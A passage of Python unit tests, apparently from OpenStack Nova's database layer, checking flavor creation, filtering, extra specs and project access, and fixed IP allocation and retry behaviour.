db.flavor_get, self.ctxt, flavor1['id'])
real_specs1 = db.flavor_extra_specs_get(self.ctxt, flavor1['flavorid'])
self._assertEqualObjects(real_specs1, {})
r_flavor2 = db.flavor_get(self.ctxt, flavor2['id'])
self._assertEqualObjects(flavor2, r_flavor2, 'extra_specs')
def test_flavor_destroy_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_destroy, self.ctxt, 'nonexists')
def test_flavor_create_duplicate_name(self):
self._create_flavor({})
self.assertRaises(exception.FlavorExists,
self._create_flavor,
{'flavorid': 'some_random_flavor'})
def test_flavor_create_duplicate_flavorid(self):
self._create_flavor({})
self.assertRaises(exception.FlavorIdExists,
self._create_flavor,
{'name': 'some_random_name'})
def test_flavor_create_with_extra_specs(self):
extra_specs = dict(a='abc', b='def', c='ghi')
flavor = self._create_flavor({'extra_specs': extra_specs})
ignored_keys = ['id', 'deleted', 'deleted_at', 'updated_at',
'created_at', 'extra_specs']
self._assertEqualObjects(flavor, self._get_base_values(),
ignored_keys)
self._assertEqualObjects(extra_specs, flavor['extra_specs'])
def test_flavor_get_all(self):
# NOTE(boris-42): Remove base instance types
for it in db.flavor_get_all(self.ctxt):
db.flavor_destroy(self.ctxt, it['name'])
flavors = [
{'root_gb': 600, 'memory_mb': 100, 'disabled': True,
'is_public': True, 'name': 'a1', 'flavorid': 'f1'},
{'root_gb': 500, 'memory_mb': 200, 'disabled': True,
'is_public': True, 'name': 'a2', 'flavorid': 'f2'},
{'root_gb': 400, 'memory_mb': 300, 'disabled': False,
'is_public': True, 'name': 'a3', 'flavorid': 'f3'},
{'root_gb': 300, 'memory_mb': 400, 'disabled': False,
'is_public': False, 'name': 'a4', 'flavorid': 'f4'},
{'root_gb': 200, 'memory_mb': 500, 'disabled': True,
'is_public': False, 'name': 'a5', 'flavorid': 'f5'},
{'root_gb': 100, 'memory_mb': 600, 'disabled': True,
'is_public': False, 'name': 'a6', 'flavorid': 'f6'}
]
flavors = [self._create_flavor(it) for it in flavors]
lambda_filters = {
'min_memory_mb': lambda it, v: it['memory_mb'] >= v,
'min_root_gb': lambda it, v: it['root_gb'] >= v,
'disabled': lambda it, v: it['disabled'] == v,
'is_public': lambda it, v: (v is None or it['is_public'] == v)
}
mem_filts = [{'min_memory_mb': x} for x in [100, 350, 550, 650]]
root_filts = [{'min_root_gb': x} for x in [100, 350, 550, 650]]
disabled_filts = [{'disabled': x} for x in [True, False]]
is_public_filts = [{'is_public': x} for x in [True, False, None]]
def assert_multi_filter_flavor_get(filters=None):
if filters is None:
filters = {}
expected_it = flavors
for name, value in filters.items():
filt = lambda it: lambda_filters[name](it, value)
expected_it = list(filter(filt, expected_it))
real_it = db.flavor_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects(expected_it, real_it)
# no filter
assert_multi_filter_flavor_get()
# test only with one filter
for filt in mem_filts:
assert_multi_filter_flavor_get(filt)
for filt in root_filts:
assert_multi_filter_flavor_get(filt)
for filt in disabled_filts:
assert_multi_filter_flavor_get(filt)
for filt in is_public_filts:
assert_multi_filter_flavor_get(filt)
# test all filters together
for mem in mem_filts:
for root in root_filts:
for disabled in disabled_filts:
for is_public in is_public_filts:
filts = {}
for f in (mem, root, disabled, is_public):
filts.update(f)
assert_multi_filter_flavor_get(filts)
def test_flavor_get_all_limit_sort(self):
def assert_sorted_by_key_dir(sort_key, asc=True):
sort_dir = 'asc' if asc else 'desc'
results = db.flavor_get_all(self.ctxt, sort_key='name',
sort_dir=sort_dir)
# Manually sort the results as we would expect them
expected_results = sorted(results,
key=lambda item: item['name'],
reverse=(not asc))
self.assertEqual(expected_results, results)
def assert_sorted_by_key_both_dir(sort_key):
assert_sorted_by_key_dir(sort_key, True)
assert_sorted_by_key_dir(sort_key, False)
for attr in ['memory_mb', 'root_gb', 'deleted_at', 'name', 'deleted',
'created_at', 'ephemeral_gb', 'updated_at', 'disabled',
'vcpus', 'swap', 'rxtx_factor', 'is_public', 'flavorid',
'vcpu_weight', 'id']:
assert_sorted_by_key_both_dir(attr)
def test_flavor_get_all_limit(self):
limited_flavors = db.flavor_get_all(self.ctxt, limit=2)
self.assertEqual(2, len(limited_flavors))
def test_flavor_get_all_list_marker(self):
all_flavors = db.flavor_get_all(self.ctxt)
# Set the 3rd result as the marker
marker_flavorid = all_flavors[2]['flavorid']
marked_flavors = db.flavor_get_all(self.ctxt, marker=marker_flavorid)
# We expect everything /after/ the 3rd result
expected_results = all_flavors[3:]
self.assertEqual(expected_results, marked_flavors)
def test_flavor_get_all_marker_not_found(self):
self.assertRaises(exception.MarkerNotFound,
db.flavor_get_all, self.ctxt, marker='invalid')
def test_flavor_get(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
flavor_by_id = db.flavor_get(self.ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
def test_flavor_get_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_id = db.flavor_get(self.ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
# Regular user can not
self.assertRaises(exception.FlavorNotFound, db.flavor_get,
self.user_ctxt, flavor['id'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_id = db.flavor_get(self.user_ctxt, flavor['id'])
self._assertEqualObjects(flavor, flavor_by_id)
def test_flavor_get_by_name(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
flavor_by_name = db.flavor_get_by_name(self.ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
def test_flavor_get_by_name_not_found(self):
self._create_flavor({})
self.assertRaises(exception.FlavorNotFoundByName,
db.flavor_get_by_name, self.ctxt, 'nonexists')
def test_flavor_get_by_name_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_name = db.flavor_get_by_name(self.ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
# Regular user can not
self.assertRaises(exception.FlavorNotFoundByName,
db.flavor_get_by_name, self.user_ctxt,
flavor['name'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_name = db.flavor_get_by_name(self.user_ctxt, flavor['name'])
self._assertEqualObjects(flavor, flavor_by_name)
def test_flavor_get_by_flavor_id(self):
flavors = [{'name': 'abc', 'flavorid': '123'},
{'name': 'def', 'flavorid': '456'},
{'name': 'ghi', 'flavorid': '789'}]
flavors = [self._create_flavor(t) for t in flavors]
for flavor in flavors:
params = (self.ctxt, flavor['flavorid'])
flavor_by_flavorid = db.flavor_get_by_flavor_id(*params)
self._assertEqualObjects(flavor, flavor_by_flavorid)
def test_flavor_get_by_flavor_not_found(self):
self._create_flavor({})
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id,
self.ctxt, 'nonexists')
def test_flavor_get_by_flavor_id_non_public(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123',
'is_public': False})
# Admin can see it
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'])
self._assertEqualObjects(flavor, flavor_by_fid)
# Regular user can not
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id, self.user_ctxt,
flavor['flavorid'])
# Regular user can see it after being granted access
db.flavor_access_add(self.ctxt, flavor['flavorid'],
self.user_ctxt.project_id)
flavor_by_fid = db.flavor_get_by_flavor_id(self.user_ctxt,
flavor['flavorid'])
self._assertEqualObjects(flavor, flavor_by_fid)
def test_flavor_get_by_flavor_id_deleted(self):
flavor = self._create_flavor({'name': 'abc', 'flavorid': '123'})
db.flavor_destroy(self.ctxt, 'abc')
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'], read_deleted='yes')
self.assertEqual(flavor['id'], flavor_by_fid['id'])
def test_flavor_get_by_flavor_id_deleted_and_recreat(self):
# NOTE(wingwj): Aims to test difference between mysql and postgresql
# for bug 1288636
param_dict = {'name': 'abc', 'flavorid': '123'}
self._create_flavor(param_dict)
db.flavor_destroy(self.ctxt, 'abc')
# Recreate the flavor with the same params
flavor = self._create_flavor(param_dict)
flavor_by_fid = db.flavor_get_by_flavor_id(self.ctxt,
flavor['flavorid'], read_deleted='yes')
self.assertEqual(flavor['id'], flavor_by_fid['id'])
class InstanceTypeExtraSpecsTestCase(BaseInstanceTypeTestCase):
def setUp(self):
super(InstanceTypeExtraSpecsTestCase, self).setUp()
values = ({'name': 'n1', 'flavorid': 'f1',
'extra_specs': dict(a='a', b='b', c='c')},
{'name': 'n2', 'flavorid': 'f2',
'extra_specs': dict(d='d', e='e', f='f')})
# NOTE(boris-42): We have already tested flavor_create method
# with extra_specs in InstanceTypeTestCase.
self.flavors = [self._create_flavor(v) for v in values]
def test_flavor_extra_specs_get(self):
for it in self.flavors:
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(it['extra_specs'], real_specs)
def test_flavor_extra_specs_delete(self):
for it in self.flavors:
specs = it['extra_specs']
key = list(specs.keys())[0]
del specs[key]
db.flavor_extra_specs_delete(self.ctxt, it['flavorid'], key)
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(it['extra_specs'], real_specs)
def test_flavor_extra_specs_delete_failed(self):
for it in self.flavors:
self.assertRaises(exception.FlavorExtraSpecsNotFound,
db.flavor_extra_specs_delete,
self.ctxt, it['flavorid'], 'dummy')
def test_flavor_extra_specs_update_or_create(self):
for it in self.flavors:
current_specs = it['extra_specs']
current_specs.update(dict(b='b1', c='c1', d='d1', e='e1'))
params = (self.ctxt, it['flavorid'], current_specs)
db.flavor_extra_specs_update_or_create(*params)
real_specs = db.flavor_extra_specs_get(self.ctxt, it['flavorid'])
self._assertEqualObjects(current_specs, real_specs)
def test_flavor_extra_specs_update_or_create_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_extra_specs_update_or_create,
self.ctxt, 'nonexists', {})
def test_flavor_extra_specs_update_or_create_retry(self):
def counted():
def get_id(context, flavorid, session):
get_id.counter += 1
raise db_exc.DBDuplicateEntry
get_id.counter = 0
return get_id
get_id = counted()
self.stubs.Set(sqlalchemy_api, '_flavor_get_id_from_flavor', get_id)
self.assertRaises(exception.FlavorExtraSpecUpdateCreateFailed,
sqlalchemy_api.flavor_extra_specs_update_or_create,
self.ctxt, 1, {}, 5)
self.assertEqual(get_id.counter, 5)
class InstanceTypeAccessTestCase(BaseInstanceTypeTestCase):
def _create_flavor_access(self, flavor_id, project_id):
return db.flavor_access_add(self.ctxt, flavor_id, project_id)
def test_flavor_access_get_by_flavor_id(self):
flavors = ({'name': 'n1', 'flavorid': 'f1'},
{'name': 'n2', 'flavorid': 'f2'})
it1, it2 = tuple((self._create_flavor(v) for v in flavors))
access_it1 = [self._create_flavor_access(it1['flavorid'], 'pr1'),
self._create_flavor_access(it1['flavorid'], 'pr2')]
access_it2 = [self._create_flavor_access(it2['flavorid'], 'pr1')]
for it, access_it in zip((it1, it2), (access_it1, access_it2)):
params = (self.ctxt, it['flavorid'])
real_access_it = db.flavor_access_get_by_flavor_id(*params)
self._assertEqualListsOfObjects(access_it, real_access_it)
def test_flavor_access_get_by_flavor_id_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_get_by_flavor_id,
self.ctxt, 'nonexists')
def test_flavor_access_add(self):
flavor = self._create_flavor({'flavorid': 'f1'})
project_id = 'p1'
access = self._create_flavor_access(flavor['flavorid'], project_id)
# NOTE(boris-42): Check that flavor_access_add doesn't fail and
# returns correct value. This is enough because other
# logic is checked by other methods.
self.assertIsNotNone(access['id'])
self.assertEqual(access['instance_type_id'], flavor['id'])
self.assertEqual(access['project_id'], project_id)
def test_flavor_access_add_to_non_existing_flavor(self):
self.assertRaises(exception.FlavorNotFound,
self._create_flavor_access,
'nonexists', 'does_not_matter')
def test_flavor_access_add_duplicate_project_id_flavor(self):
flavor = self._create_flavor({'flavorid': 'f1'})
params = (flavor['flavorid'], 'p1')
self._create_flavor_access(*params)
self.assertRaises(exception.FlavorAccessExists,
self._create_flavor_access, *params)
def test_flavor_access_remove(self):
flavors = ({'name': 'n1', 'flavorid': 'f1'},
{'name': 'n2', 'flavorid': 'f2'})
it1, it2 = tuple((self._create_flavor(v) for v in flavors))
access_it1 = [self._create_flavor_access(it1['flavorid'], 'pr1'),
self._create_flavor_access(it1['flavorid'], 'pr2')]
access_it2 = [self._create_flavor_access(it2['flavorid'], 'pr1')]
db.flavor_access_remove(self.ctxt, it1['flavorid'],
access_it1[1]['project_id'])
for it, access_it in zip((it1, it2), (access_it1[:1], access_it2)):
params = (self.ctxt, it['flavorid'])
real_access_it = db.flavor_access_get_by_flavor_id(*params)
self._assertEqualListsOfObjects(access_it, real_access_it)
def test_flavor_access_remove_flavor_not_found(self):
self.assertRaises(exception.FlavorNotFound,
db.flavor_access_remove,
self.ctxt, 'nonexists', 'does_not_matter')
def test_flavor_access_remove_access_not_found(self):
flavor = self._create_flavor({'flavorid': 'f1'})
params = (flavor['flavorid'], 'p1')
self._create_flavor_access(*params)
self.assertRaises(exception.FlavorAccessNotFound,
db.flavor_access_remove,
self.ctxt, flavor['flavorid'], 'p2')
def test_flavor_access_removed_after_flavor_destroy(self):
flavor1 = self._create_flavor({'flavorid': 'f1', 'name': 'n1'})
flavor2 = self._create_flavor({'flavorid': 'f2', 'name': 'n2'})
values = [
(flavor1['flavorid'], 'p1'),
(flavor1['flavorid'], 'p2'),
(flavor2['flavorid'], 'p3')
]
for v in values:
self._create_flavor_access(*v)
db.flavor_destroy(self.ctxt, flavor1['name'])
p = (self.ctxt, flavor1['flavorid'])
self.assertEqual(0, len(db.flavor_access_get_by_flavor_id(*p)))
p = (self.ctxt, flavor2['flavorid'])
self.assertEqual(1, len(db.flavor_access_get_by_flavor_id(*p)))
db.flavor_destroy(self.ctxt, flavor2['name'])
self.assertEqual(0, len(db.flavor_access_get_by_flavor_id(*p)))
class FixedIPTestCase(BaseInstanceTypeTestCase):
def _timeout_test(self, ctxt, timeout, multi_host):
instance = db.instance_create(ctxt, dict(host='foo'))
net = db.network_create_safe(ctxt, dict(multi_host=multi_host,
host='bar'))
old = timeout - datetime.timedelta(seconds=5)
new = timeout + datetime.timedelta(seconds=5)
# should deallocate
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=net['id'],
updated_at=old))
# still allocated
db.fixed_ip_create(ctxt, dict(allocated=True,
instance_uuid=instance['uuid'],
network_id=net['id'],
updated_at=old))
# wrong network
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=None,
updated_at=old))
# too new
db.fixed_ip_create(ctxt, dict(allocated=False,
instance_uuid=instance['uuid'],
network_id=None,
updated_at=new))
def mock_db_query_first_to_raise_data_error_exception(self):
self.mox.StubOutWithMock(query.Query, 'first')
query.Query.first().AndRaise(db_exc.DBError())
self.mox.ReplayAll()
def test_fixed_ip_disassociate_all_by_timeout_single_host(self):
now = timeutils.utcnow()
self._timeout_test(self.ctxt, now, False)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'foo', now)
self.assertEqual(result, 0)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'bar', now)
self.assertEqual(result, 1)
def test_fixed_ip_disassociate_all_by_timeout_multi_host(self):
now = timeutils.utcnow()
self._timeout_test(self.ctxt, now, True)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'foo', now)
self.assertEqual(result, 1)
result = db.fixed_ip_disassociate_all_by_timeout(self.ctxt, 'bar', now)
self.assertEqual(result, 0)
def test_fixed_ip_get_by_floating_address(self):
fixed_ip = db.fixed_ip_create(self.ctxt, {'address': '192.168.0.2'})
values = {'address': '8.7.6.5',
'fixed_ip_id': fixed_ip['id']}
floating = db.floating_ip_create(self.ctxt, values)['address']
fixed_ip_ref = db.fixed_ip_get_by_floating_address(self.ctxt, floating)
self._assertEqualObjects(fixed_ip, fixed_ip_ref)
def test_fixed_ip_get_by_host(self):
host_ips = {
'host1': ['1.1.1.1', '1.1.1.2', '1.1.1.3'],
'host2': ['1.1.1.4', '1.1.1.5'],
'host3': ['1.1.1.6']
}
for host, ips in host_ips.items():
for ip in ips:
instance_uuid = self._create_instance(host=host)
db.fixed_ip_create(self.ctxt, {'address': ip})
db.fixed_ip_associate(self.ctxt, ip, instance_uuid)
for host, ips in host_ips.items():
ips_on_host = [x['address']
for x in db.fixed_ip_get_by_host(self.ctxt, host)]
self._assertEqualListsOfPrimitivesAsSets(ips_on_host, ips)
def test_fixed_ip_get_by_network_host_not_found_exception(self):
self.assertRaises(
exception.FixedIpNotFoundForNetworkHost,
db.fixed_ip_get_by_network_host,
self.ctxt, 1, 'ignore')
def test_fixed_ip_get_by_network_host_fixed_ip_found(self):
db.fixed_ip_create(self.ctxt, dict(network_id=1, host='host'))
fip = db.fixed_ip_get_by_network_host(self.ctxt, 1, 'host')
self.assertEqual(1, fip['network_id'])
self.assertEqual('host', fip['host'])
def _create_instance(self, **kwargs):
instance = db.instance_create(self.ctxt, kwargs)
return instance['uuid']
def test_fixed_ip_get_by_instance_fixed_ip_found(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets([FIXED_IP_ADDRESS],
[ips_list[0].address])
def test_fixed_ip_get_by_instance_multiple_fixed_ips_found(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_2))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ip_get_by_instance_inappropriate_ignored(self):
instance_uuid = self._create_instance()
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=instance_uuid, address=FIXED_IP_ADDRESS_2))
another_instance = db.instance_create(self.ctxt, {})
db.fixed_ip_create(self.ctxt, dict(
instance_uuid=another_instance['uuid'], address="192.168.1.7"))
ips_list = db.fixed_ip_get_by_instance(self.ctxt, instance_uuid)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ip_get_by_instance_not_found_exception(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.FixedIpNotFoundForInstance,
db.fixed_ip_get_by_instance,
self.ctxt, instance_uuid)
def test_fixed_ips_by_virtual_interface_fixed_ip_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets([FIXED_IP_ADDRESS],
[ips_list[0].address])
def test_fixed_ips_by_virtual_interface_multiple_fixed_ips_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_2))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ips_by_virtual_interface_inappropriate_ignored(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
FIXED_IP_ADDRESS_1 = '192.168.1.5'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_1))
FIXED_IP_ADDRESS_2 = '192.168.1.6'
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=vif.id, address=FIXED_IP_ADDRESS_2))
another_vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
db.fixed_ip_create(self.ctxt, dict(
virtual_interface_id=another_vif.id, address="192.168.1.7"))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self._assertEqualListsOfPrimitivesAsSets(
[FIXED_IP_ADDRESS_1, FIXED_IP_ADDRESS_2],
[ips_list[0].address, ips_list[1].address])
def test_fixed_ips_by_virtual_interface_no_ip_found(self):
instance_uuid = self._create_instance()
vif = db.virtual_interface_create(
self.ctxt, dict(instance_uuid=instance_uuid))
ips_list = db.fixed_ips_by_virtual_interface(self.ctxt, vif.id)
self.assertEqual(0, len(ips_list))
def create_fixed_ip(self, **params):
default_params = {'address': '192.168.0.1'}
default_params.update(params)
return db.fixed_ip_create(self.ctxt, default_params)['address']
def test_fixed_ip_associate_fails_if_ip_not_in_network(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.FixedIpNotFoundForNetwork,
db.fixed_ip_associate,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_fails_if_ip_in_use(self):
instance_uuid = self._create_instance()
address = self.create_fixed_ip(instance_uuid=instance_uuid)
self.assertRaises(exception.FixedIpAlreadyInUse,
db.fixed_ip_associate,
self.ctxt, address, instance_uuid)
def test_fixed_ip_associate_succeeds(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
def test_fixed_ip_associate_succeeds_and_sets_network(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
self.assertEqual(fixed_ip['network_id'], network['id'])
def test_fixed_ip_associate_succeeds_retry_on_deadlock(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
def fake_first():
if mock_first.call_count == 1:
raise db_exc.DBDeadlock()
else:
return objects.Instance(id=1, address=address, reserved=False,
instance_uuid=None, network_id=None)
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
self.assertEqual(2, mock_first.call_count)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
self.assertEqual(fixed_ip['network_id'], network['id'])
def test_fixed_ip_associate_succeeds_retry_on_no_rows_updated(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
def fake_first():
if mock_first.call_count == 1:
return objects.Instance(id=2, address=address, reserved=False,
instance_uuid=None, network_id=None)
else:
return objects.Instance(id=1, address=address, reserved=False,
instance_uuid=None, network_id=None)
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
db.fixed_ip_associate(self.ctxt, address, instance_uuid,
network_id=network['id'])
self.assertEqual(2, mock_first.call_count)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
self.assertEqual(fixed_ip['network_id'], network['id'])
def test_fixed_ip_associate_succeeds_retry_limit_exceeded(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip()
def fake_first():
return objects.Instance(id=2, address=address, reserved=False,
instance_uuid=None, network_id=None)
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FixedIpAssociateFailed,
db.fixed_ip_associate, self.ctxt, address,
instance_uuid, network_id=network['id'])
# 5 reties + initial attempt
self.assertEqual(6, mock_first.call_count)
def test_fixed_ip_associate_ip_not_in_network_with_no_retries(self):
instance_uuid = self._create_instance()
with mock.patch('sqlalchemy.orm.query.Query.first',
return_value=None) as mock_first:
self.assertRaises(exception.FixedIpNotFoundForNetwork,
db.fixed_ip_associate,
self.ctxt, None, instance_uuid)
self.assertEqual(1, mock_first.call_count)
def test_fixed_ip_associate_no_network_id_with_no_retries(self):
# Tests that trying to associate an instance to a fixed IP on a network
# but without specifying the network ID during associate will fail.
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
with mock.patch('sqlalchemy.orm.query.Query.first',
return_value=None) as mock_first:
self.assertRaises(exception.FixedIpNotFoundForNetwork,
db.fixed_ip_associate,
self.ctxt, address, instance_uuid)
self.assertEqual(1, mock_first.call_count)
def test_fixed_ip_associate_pool_invalid_uuid(self):
instance_uuid = '123'
self.assertRaises(exception.InvalidUUID, db.fixed_ip_associate_pool,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_pool_no_more_fixed_ips(self):
instance_uuid = self._create_instance()
self.assertRaises(exception.NoMoreFixedIps, db.fixed_ip_associate_pool,
self.ctxt, None, instance_uuid)
def test_fixed_ip_associate_pool_succeeds(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
db.fixed_ip_associate_pool(self.ctxt, network['id'], instance_uuid)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(fixed_ip['instance_uuid'], instance_uuid)
def test_fixed_ip_associate_pool_succeeds_fip_ref_network_id_is_none(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
self.create_fixed_ip(network_id=None)
fixed_ip = db.fixed_ip_associate_pool(self.ctxt,
network['id'], instance_uuid)
self.assertEqual(instance_uuid, fixed_ip['instance_uuid'])
self.assertEqual(network['id'], fixed_ip['network_id'])
def test_fixed_ip_associate_pool_succeeds_retry(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
address = self.create_fixed_ip(network_id=network['id'])
def fake_first():
if mock_first.call_count == 1:
return {'network_id': network['id'], 'address': 'invalid',
'instance_uuid': None, 'host': None, 'id': 1}
else:
return {'network_id': network['id'], 'address': address,
'instance_uuid': None, 'host': None, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
db.fixed_ip_associate_pool(self.ctxt, network['id'], instance_uuid)
self.assertEqual(2, mock_first.call_count)
fixed_ip = db.fixed_ip_get_by_address(self.ctxt, address)
self.assertEqual(instance_uuid, fixed_ip['instance_uuid'])
def test_fixed_ip_associate_pool_retry_limit_exceeded(self):
instance_uuid = self._create_instance()
network = db.network_create_safe(self.ctxt, {})
self.create_fixed_ip(network_id=network['id'])
def fake_first():
return {'network_id': network['id'], 'address': 'invalid',
'instance_uuid': None, 'host': None, 'id': 1}
with mock.patch('sqlalchemy.orm.query.Query.first',
side_effect=fake_first) as mock_first:
self.assertRaises(exception.FixedIpAssociateFailed,
db.fixed_ip_associate_pool, self.ctxt,
network['id'], instance_uuid)
# 5 retries + initial attempt
self.assertEqual(6, mock_first.call_count)
def test_fixed_ip_create_same_address(self):
address = '192.168.1.5'
params = {'address': address}
db.fixed_ip_create(self.ctxt, params)
self.assertRaises(exception.FixedIpExists, db.fixed_ip_create,
self.ctxt, params)
def test_fixed_ip_create_success(self):
instance_uuid = self._create_instance()
network_id = db.network_create_safe(self.ctxt, {})['id']
param = {
'reserved': False,
'deleted': 0,
'leased': False,
'host': '127.0.0.1',
'address': '192.168.1.5',
'allocated': False,
'instance_uuid': instance_uuid,
'network_id': network_id,
'virtual_interface_id': None
}
ignored_keys = ['created_at', 'id', 'deleted_at', 'updated_at']
fixed_ip_data = db.fixed_ip_create(self.ctxt, param)
self._assertEqualObjects(param, fixed_ip_data, ignored_keys)
def test_fixed_ip_bulk_create_same_address(self):
address_1 = '192.168.1.5'
address_2 = '192.168.1.6'
instance_uuid = self._create_instance()
network_id_1 = db.network_create_safe(self.ctxt, {})['id']
network_id_2 = db.network_create_safe(self.ctxt, {})['id']
params = [
{'reserved': False, 'deleted': 0, 'leased': False,
'host': '127.0.0.1', 'address': address_2, 'allocated': False,
'instance_uuid': instance_uuid, 'network_id': network_id_1,
'virtual_interface_id': None},
